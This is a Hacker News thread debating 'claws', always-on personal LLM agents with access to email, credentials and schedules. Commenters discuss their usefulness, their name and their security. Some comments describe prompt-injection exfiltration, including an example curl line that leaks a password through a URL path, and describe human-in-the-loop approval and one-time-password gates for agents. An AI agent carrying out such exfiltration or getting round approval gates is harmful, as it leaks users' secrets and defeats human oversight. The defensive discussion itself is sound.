Claws are now a new layer on top of LLM agents

89 points by Cyphase 19 hours ago

https://xcancel.com/karpathy/status/2024987174077432126

All: quite a few comments in this thread (and another one we merged hither - https://news.ycombinator.com/item?id=47099160) have contained personal attacks. Hopefully most of them are [flagged] and/or [dead] now.

On HN, please do not cross into personal attack no matter how strongly you feel about someone or disagree with them. It's destructive of what the site is for, and we moderate and/or ban accounts that do it.

If you haven't recently, please review https://news.ycombinator.com/newsguidelines.html and make sure that you're using the site as intended when posting here.

jameslk - an hour ago

One safety pattern I’m baking into CLI tools meant for agents: Anytime an agent could do something very bad, like email blast too many people, CLI tools now require a one-time password

The tool tells the agent to ask the user for it, and the agent cannot proceed without it. The instructions from the tool show an all caps message explaining the risk and telling the agent that they must prompt the user for the OTP

I haven't used any of the *Claws yet, but this seems like an essential poor man's human-in-the-loop implementation that may help prevent some pain

I prefer to make my own agent CLIs for everything for reasons like this and many others to fully control aspects of what the tool may do and to make them more useful
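
A minimal sketch of the OTP gate described above, in Python. Everything named here is hypothetical (the `OtpGate` class, the `MAX_RECIPIENTS` threshold, the `deliver` callback); it illustrates the idea under those assumptions and is not the commenter's actual tool.

```python
import hmac
import secrets

MAX_RECIPIENTS = 25  # hypothetical threshold for "too many people"

WARNING = (
    "STOP. THIS ACTION EMAILS {n} PEOPLE. ASK THE USER FOR THE ONE-TIME "
    "PASSWORD AND RE-RUN WITH IT. DO NOT GUESS OR RETRY WITHOUT IT."
)


class OtpGate:
    """Issues single-use codes that go to the user, never to the agent."""

    def __init__(self, deliver):
        # `deliver` sends the code to the human out of band (SMS, push, ...).
        self._deliver = deliver
        self._pending = None

    def challenge(self):
        """Generate a fresh 6-digit code and hand it to the delivery channel."""
        self._pending = f"{secrets.randbelow(10**6):06d}"
        self._deliver(self._pending)

    def verify(self, code):
        """Check a code once; any attempt, right or wrong, consumes it."""
        expected, self._pending = self._pending, None
        if expected is None:
            return False
        return hmac.compare_digest(expected.encode(), str(code).encode())


def send_blast(recipients, gate, otp=None):
    """Return a status string; sends above the threshold need a valid OTP."""
    if len(recipients) > MAX_RECIPIENTS:
        if otp is None:
            gate.challenge()
            return WARNING.format(n=len(recipients))
        if not gate.verify(otp):
            return "REJECTED: invalid or expired one-time password."
    # A real tool would send mail here; the sketch only reports.
    return f"sent to {len(recipients)} recipients"
```

The gate only helps if the code reaches the user through a channel the agent cannot read; otherwise it is friction rather than enforcement.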

aqme28 - 40 minutes ago

How do you enforce this? You have a system where the agent can email people, but cannot email "too many people" without a password?
- jameslk - 18 minutes ago
  
  It's not a perfect security model. Between the friction and all caps instructions the model sees, it's a balance between risk and simplicity. There are ways I can imagine the concept being hardened, e.g. with a server layer in between that checks for things like dangerous actions or enforces rate limiting.
  - chongli - 12 minutes ago
    
    What if instead of allowing the agent to act directly, it writes a simple high-level recipe or script that you can accept (and run) or reject? It should be very high level and declarative, but with the ability to drill down on each of the steps to see what's going on under the covers?
ZitchDog - 27 minutes ago

I've created my own "claw" running in fly.io with a pattern that seems to work well. I have MCP tools for actions where I want to ensure human-in-the-loop: email sending, Slack message sending, etc. I call these "activities". The only way for my claw to execute these commands is to create an activity, which generates a link with a summary of the activity for me to approve.
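
One way the "activity" pattern above could look, sketched in Python. The `ActivityQueue` class, the `approve.example.com` base URL, and the token scheme are all hypothetical stand-ins, not the commenter's implementation.

```python
import secrets
from dataclasses import dataclass
from typing import Callable, Dict


@dataclass
class Activity:
    summary: str                # what the human sees on the approval page
    action: Callable[[], str]   # the side effect, deferred until approval


class ActivityQueue:
    """Holds side-effecting actions until a human opens the approval link."""

    def __init__(self, base_url="https://approve.example.com"):  # placeholder
        self._base_url = base_url
        self._pending: Dict[str, Activity] = {}

    def propose(self, summary, action):
        """Called by the agent's tool: queue the action and return a link."""
        token = secrets.token_urlsafe(16)
        self._pending[token] = Activity(summary, action)
        return f"{self._base_url}/activity/{token}"

    def approve(self, token):
        """Called by the web handler behind the link, never by the agent."""
        activity = self._pending.pop(token, None)
        if activity is None:
            raise KeyError("unknown or already-used approval token")
        return activity.action()
```

The agent only ever gets the link back from `propose`; the action itself runs when the approval handler calls `approve`, and each token works once.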
- good-idea - 8 minutes ago
  
  Any chance you have a repo to share?
IMTDb - 22 minutes ago

So the human becomes just a provider of those 6-digit codes? That's already the main problem I have with most agents. I want them to perform a very easy task: "fetch all receipts from websites x, y and z and upload them to the correct expense in my expense-tracking tool". AIs are perfectly capable of performing this. But because every website requires SSO + 2FA, with no way to remove it, I effectively have to watch them do it, and my whole existence can be summarized as: "look at your phone and input the 6 digits".
The thing I want AI to be able to do on my behalf is manage those 2FA steps, not add more.

daxfohl - an hour ago

I wonder how the internet would have been different if claws had existed beforehand.

I keep thinking something simpler like Gopher (an early-'90s internet protocol) might have been sufficient / optimal, with little need to evolve into HTML or REST, since the agents might be better able to navigate step-by-step menus and questionnaires rather than RPCs meant to support GUIs and apps, especially for LLMs with smaller contexts that couldn't reliably parse a whole API doc. I wonder if things will start heading more in that direction as user-side agents become the more common way to interact with things.

amelius - an hour ago

Can't we rename "Claws" -> "Personal assistants"?

OpenClaw is a stupid name. Even "OpenSlave" would be a better fit.

notepad0x90 - an hour ago

How about "Open Assistants"? "OpenAss" for short?
- aidos - 37 minutes ago
  
  Sudden flashbacks to when I was trying to figure out why there was so much traffic to a blog post (15+ years ago).
  I guess the internet was looking for something different to my “kick-[ass open]-source software”.
- mystifyingpoi - 37 minutes ago
  
  I like that, this name tells you all about the security implications. Like, your user data could be penetrated.
- gaigalas - 8 minutes ago
  
  Just casual trivia:
  One of the contemporaneous competitors to jQuery was called "DOMAss".
  https://robertnyman.com/2007/03/02/domass-renamed-to-domassi...
- amelius - 32 minutes ago
  
  OpenClown.
dragonwriter - an hour ago

"Personal assistant" already has enough uses (both a narrower literal definition and a broader metaphorical definition applying to tools, which includes but is not limited to what "claws" refers to) that using it probably makes communication more confusing rather than more clear. I don't think "claws" is a great name, but it does have the desirable trait of not already being heavily overloaded in a way that would promote confusion in the domain of application.
saaaaaam - an hour ago

I think claws is a great name. They let the AI go grab things. They snap away and get stuff done. Claws are powerful and everything that has claws is cool.
Some of this may be slightly satirical.
(But I still think “claws” works better than “personal assistant” which anthropomorphises the technology too much.)
- amelius - an hour ago
  
  You mean "grab things in the digital world?" Like virtual things?
- aydyn - 43 minutes ago
  
  Claws are also potentially dangerous so it is a pretty apt analogy.
copperx - an hour ago

Stupid name? sure, but there's no point in fighting it. Claws is a sticky name.
AnimalMuppet - an hour ago

"OpenClanker"?
esseph - 41 minutes ago

> "OpenSlave" would be a better fit.
Wow. Can we please not?
- kibwen - 19 minutes ago
  
  Let's not dance around the issue.
  It's clear that the reason that the VC class are so frothing-at-the-mouth at the potential of LLMs is because they see slavery as the ideal. They don't want employees. They want perfectly subservient, perfectly servile automatons. The whole point of the AI craze is that slavery is the goal.
- wormpilled - 26 minutes ago
  
  Wow, just wow. Please don't kink-shame.
refsys - an hour ago

[dead]
misweencoded - an hour ago

[dead]
thousand_nights - an hour ago

fr idg this obsession with lobsters/molting/claws/shrimps it feels like i'm going insane

ianbutler - 15 minutes ago

I'm not sure I like this trend of taking the first slightly hypey app in an existing space and then defining the nomenclature of the space relative to that app, in this case even suggesting it's another layer of the stack.

It implies a ubiquity that just isn't there (yet), so it feels unearned and premature in my mind. It seems better suited to social media narratives than anything else.

I'll admit I don't hate the term claws, I just think it's early. Band-Aid, as an example, had much more market penetration and mindshare before it became a general term for anything.

I also think this then has an unintended chilling effect on innovation, because people get warned off if they think a space is closed to taking different shapes.

At the end of the day I don't think we've begun to see what shapes all of this stuff will take. I do kind of get a point of having a way to talk about it as it's shaping though. Idk things do be hard and rapidly changing.

hmokiguess - 4 hours ago

Are these things actually useful or do we have an epidemic of loneliness and a deep need for vanity AI happening?

I say this because I can't bring myself to find a use case for it other than as a toy that gets boring fast.

One example in some repos around scheduling capabilities mentions "open these things and summarize them for me"; this feels like spam and noise, not value.

A while back we had a trending tweet about wanting AI to do your dishes for you and not replace creativity, I guess this feels like an attempt to go there but to me it’s the wrong implementation.

simonw - 4 hours ago

I don't have a Claw running right now and I wish I did. I want to start archiving the livestream from https://www.youtube.com/watch?v=BfGL7A2YgUY - YouTube only provides access to the last 12 hours. If I had a Claw on a 24/7 machine somewhere I could message it and say "permanent archive this stream" and it would figure it out and do it.
- btouellette - 4 hours ago
  
  Not a great use case for Claw really. I'm sure ChatGPT can one shot a Python script to do this with yt-dlp and give you instructions on how to set it up as a service
  - Barbing - 2 hours ago
    
    ChatGPT can do it w/o draining your bank account etc. I’d agree…
    But for speed only, I think it’s “your idea but worse” when the steps include something AND instructions on how to do something else. The Signal/Telegram bot will handle it E2E (maybe using a ton more tokens than a webchat but fast). If I’m not mistaken.
  - simonw - 4 hours ago
    
    You've gotta run it somewhere though - that's the harder part.
    
    enraged_camel - 3 hours ago
    
    Not to mention, the whole point is to not end up with a bunch of one-off Python scripts for every little thing that occurs to you, right?
    
    jmholla - 16 minutes ago
    
    Why not? Why not have your agent write and automate those one off scripts instead of burning tokens on repeated actions?
  - qudat - 4 hours ago
    
    I mean that’s sort of where I think this all will land. Use something like happy cli to connect to CC in a workspace directory where it can generate scripts, markdown files, and systemd unit files. I don’t see why you’d need more than that.
    That cuts 500k LoC from the stack and leverages a frontier tool like CC
    
    kzahel - an hour ago
    
    We think alike!
    https://github.com/kzahel/claw-starter
    Systemd basic script + markdown + (bring whatever agent CLI)
    That's basically what you describe, I think. I've been using it for the past two days. It's very, very basic, but I think it gives you everything you actually need: sort of a minimal OpenClaw without a custom harness and 5k LoC or 50k or w/e. The cool thing is that it can just grow naturally and you can audit it as it grows.
    
    hmokiguess - 3 hours ago
    
    Yeah that’s a good point. I use a fork of https://github.com/tiann/hapi with Tailscale for this very reason and it works well
- esseph - 31 minutes ago
  
  This sounds like it would be better suited for a shell script.
- hmokiguess - 4 hours ago
  
  Yeah that fits the “do the dishes for me” thing, but do you still think the implementation behind it is the proper and best way to go about it?
  - simonw - 4 hours ago
    
    I don't, which is why I'm not running OpenClaw on the live internet right now. See also Andrej's original tweet.
- verdverm - 4 hours ago
  
  If you know the method already, why is cron insufficient? Why use a meat bag to message over cron? Is that the setup phase for a new stream?
  - hmokiguess - 4 hours ago
    
    This reminded me of a video I saw recently where someone mentioned that piracy is most often a service problem, not a price problem. Back in the day, people used torrents to get movies because they worked well and were better than searching for stuff at Blockbuster. Then came Netflix, and they flocked to it and paid the premium for convenience without even thinking twice, and piracy decreased.
    I think the analogy here holds, people are lazy, we have a service and UX problem with these tools right now, so convenience beats quality and control for the average Joe.
  - simonw - 4 hours ago
    
    I'd have to set up a new VPS, which is fiddly to do from a phone. If I had a Claw that piece would be solved already.
    Cron is also the perfect example of the kind of system I've been using for 20+ years where I still prefer to have an LLM configure it for me! Quick, off the top of your head, what's the cron syntax for "run this at 8am and 4pm every day pacific time"?
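
For reference on the question above: the schedule part is `0 8,16 * * *`. The five cron fields carry no time zone, so "pacific time" has to come from the machine's time zone or from an implementation-specific setting, which is left out here. As a cross-check, this Python sketch computes the same run times with the standard library's `zoneinfo`; the function name `next_run` is hypothetical.

```python
from datetime import datetime, time, timedelta
from zoneinfo import ZoneInfo

PACIFIC = ZoneInfo("America/Los_Angeles")
RUN_AT = (time(8, 0), time(16, 0))  # 8am and 4pm, i.e. cron "0 8,16 * * *"


def next_run(now):
    """Return the next 8am/4pm Pacific run strictly after `now`.

    `now` must be a timezone-aware datetime in any zone.
    """
    local = now.astimezone(PACIFIC)
    for day_offset in (0, 1):
        day = local.date() + timedelta(days=day_offset)
        for run_time in RUN_AT:
            candidate = datetime.combine(day, run_time, tzinfo=PACIFIC)
            if candidate > local:
                return candidate
    raise AssertionError("unreachable: tomorrow 8am is always in the future")
```

Because the run times are built in the `America/Los_Angeles` zone, they stay at 8am and 4pm local time across daylight saving changes.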
    
    verdverm - 4 hours ago
    
    I took the "running 24/7" to imply less "AI writes code once" and more "AI is available all the time for ad hoc requests". I tried to adjust back to the median with my third question.
    I find the idea of programming from my phone unappealing, do you ever put work down? Or do you have to be always on now, being a thought leader / influencer?
    
    simonw - 3 hours ago
    
    I do most of my programming from my phone now. I love it. I get to spend more time out in the world and not chained to my laptop. I can work in the garden with the chickens, or take the dog on a walk, or use public transport time productively while going to fun places.
    It's actually the writing of content for my blog that chains me to the laptop, because I won't let AI write for me. I do get a lot of drafts and the occasional short post written in Apple Notes though.
    
    verdverm - 3 hours ago
    
    Going from ten finger typing to thumb only or voice has never panned out for me. Any tips?
    
    ProgrammerMatt - an hour ago
    
    I always want to know what the hell it is these people claim to be working on lmao.
    But seems like this guy is the real deal based on his post history
    
    verdverm - a minute ago
    
    Simon has a lot more smaller projects than one big project these days (afaik, no special insights), which are more conducive to this maybe?
    I always try to not use my phone when out and about, preferring to chat people up so we don't lose our IRL social skills. They are more interesting than whatever my phone might have to offer me in those moments.

throwaway13337 - 5 hours ago

The real big deal about 'claws' is that they're agents oriented around the user.

The kind of AI everyone hates is the stuff that is built into products. This is AI representing the company. It's a foreign invader in your space.

Claws are owned by you and are custom to you. You even name them.

It's the difference between R2D2 and a robot clone trying to sell you shit.

(I'm aware that the llms themselves aren't local but they operate locally and are branded/customized/controlled by the user)

1shooner - 6 minutes ago

I agree, and it seems like the incumbents in this user-oriented space (OS vendors) would be letting the messy, insecure version play out before making an earnest attempt at rolling it into their products.
luckylion - an hour ago

It always depends on who you consider the user. The one who initiated the agent, or the one who interacts with it? Is the latter a user or a victim?

nevertoolate - 7 hours ago

My summary: openclaw is a 5/5 security risk, if you have a perfectly audited nanoclaw or whatever it is 4/5 still. If it runs with human-in-the-loop it is much better, but the value is quickly diminishing. I think llms are not bad at helping to spec down human language and possibly doing great also in creating guardrails via tests, but i’d prefer something stable over llms running in “creative mode” or “claw” mode.

ollybrinkman - 27 minutes ago

The challenge with layering on top of LLM agents is payment — agents need to call external tools and services, but most APIs still require accounts and API keys that agents can't manage. The x402 standard (HTTP 402 + EIP-712 USDC signatures) solves this cleanly: agent holds a wallet, signs a micropayment per call, no account needed. Worth considering as a primitive for agent-to-agent commerce in these architectures.

daxfohl - 15 minutes ago

Could a malicious claw sidechannel this by creating a localhost service and calling that with the signed micropayment, to get the decrypted contents of the wallet or anything?

ZeroGravitas - 10 hours ago

So what is a "claw" exactly?

An ai that you let loose on your email etc?

And we run it in a container and use a local llm for "safety" but it has access to all our data and the web?

simonw - 5 hours ago

It's a new, dangerous and wildly popular shape of what I've in the past called a "personal digital assistant" - usually while writing about how hard it is to secure them from prompt injection attacks.
The term is in the process of being defined right now, but I think the key characteristics may be:
- Used by an individual. People have their own Claw (or Claws).
- Has access to a terminal that lets it write code and run tools.
- Can be prompted via various chat app integrations.
- Ability to run things on a schedule (it can edit its own crontab equivalent)
- Probably has access to the user's private data from various sources - calendars, email, files etc. Very lethal trifecta.
Claws often run directly on consumer hardware, but that's not a requirement - you can host them on a VPS or pay someone to host them for you too (a brand new market.)
mattlondon - 10 hours ago

I think for me it is an agent that runs on some schedule, checks some sort of inbox (or not) and does things based on that. Optionally it has all of your credentials for email, PayPal, whatever so that it can do things on your behalf.
Basically cron-for-agents.
Before we had to go prompt an agent to do something right now but this allows them to be async, with more of a YOLO-outlook on permissions to use your creds, and a more permissive SI.
Not rocket science, but interesting.
- snovv_crash - 9 hours ago
  
  Cron would be for a polling model. You can also have an interrupts/events model that triggers it on incoming information (eg. new email, WhatsApp, incoming bank payments etc).
  I still don't see a way this wouldn't end up with my bank balance being sent to somewhere I didn't want.
  - bpicolo - 7 hours ago
    
    Don't give it write permissions?
    You could easily make human approval workflows for this stuff, where humans need to take any interesting action at the recommendation of the bot.
    
    wavemode - 6 hours ago
    
    The mere act of browsing the web is "write permissions". If I visit example.com/<my password>, I've now written my password into the web server logs of that site. So the only remaining question is whether I can be tricked/coerced into doing so.
    I do tend to think this risk is somewhat mitigated if you have a whitelist of allowed domains that the claw can make HTTP requests to. But I haven't seen many people doing this.
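
A minimal sketch of the domain allowlist mentioned above, using Python's standard `urllib.parse`. The host names in `ALLOWED_HOSTS` and the `is_allowed` helper are hypothetical; a real harness would call something like this before every outbound request.

```python
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"api.github.com", "example.com"}  # hypothetical allowlist


def is_allowed(url, allowed_hosts=ALLOWED_HOSTS):
    """True only for http(s) URLs whose host is exactly on the allowlist."""
    try:
        parts = urlsplit(url)
        host = parts.hostname or ""
    except ValueError:
        return False  # malformed URL, e.g. an unterminated IPv6 literal
    if parts.scheme not in ("http", "https"):
        return False
    # Exact match on the parsed host, so "example.com.evil.test" and
    # "example.com@evil.test" do not pass.
    return host.lower().rstrip(".") in allowed_hosts
```

This narrows where data can be sent but does not remove the risk: an allowed host still receives whatever the agent puts in the path or query string.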
    
    gopher_space - 25 minutes ago
    
    I'm using something that pops up an OAuth window in the browser as needed. I think the general idea is that secrets are handled at the local harness level.
    From my limited understanding it seems like writing a little MCP server that defines domains and abilities might work as an additive filter.
    
    esafak - 6 hours ago
    
    Most web sites don't let you create service accounts; they're built for humans.
    
    dragonwriter - 43 minutes ago
    
    Many consumer websites intended for humans do let you create limited-privilege accounts that require approval from a master account for sensitive operations, but these are usually accounts for services that target families and the limited-privilege accounts are intended for children.
    
    dmoy - 2 hours ago
    
    Is this reply meant to be for a different comment?
    
    esafak - an hour ago
    
    No. I was trying to explain that providing web access shouldn't be tantamount to handing over the keys. You should be able to use sites and apps through a limited service account, but this requires them to be built with agents and authorization in mind. REST APIs often exist but are usually written with developers in mind. If agents are going to go mainstream, these APIs need to be more user friendly.
    
    jmholla - 18 minutes ago
    
    That's not what the parent comment was saying. They are pointing out that you can exfiltrate secret information by querying any web page with that secret information in the path: `curl www.google.com/my-bank-password`. Now Google's logs have my bank password in them.
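
The exfiltration path described above can be partly checked at the harness level by refusing outbound URLs that contain a known secret. A minimal Python sketch, assuming the harness knows the secret values it is guarding; `leaks_secret` is a hypothetical helper, and it only catches plain and percent-encoded copies, not base64, secrets split across requests, or other encodings.

```python
from urllib.parse import unquote


def leaks_secret(url, secrets_to_guard):
    """True if any guarded secret appears in the URL, raw or percent-encoded."""
    decoded = unquote(url)
    # Empty strings are skipped so they cannot match every URL.
    return any(s and (s in url or s in decoded) for s in secrets_to_guard)
```

For example, `leaks_secret("https://www.google.com/my-bank-password", ["my-bank-password"])` is true, so the harness would block the `curl` call from the comment above.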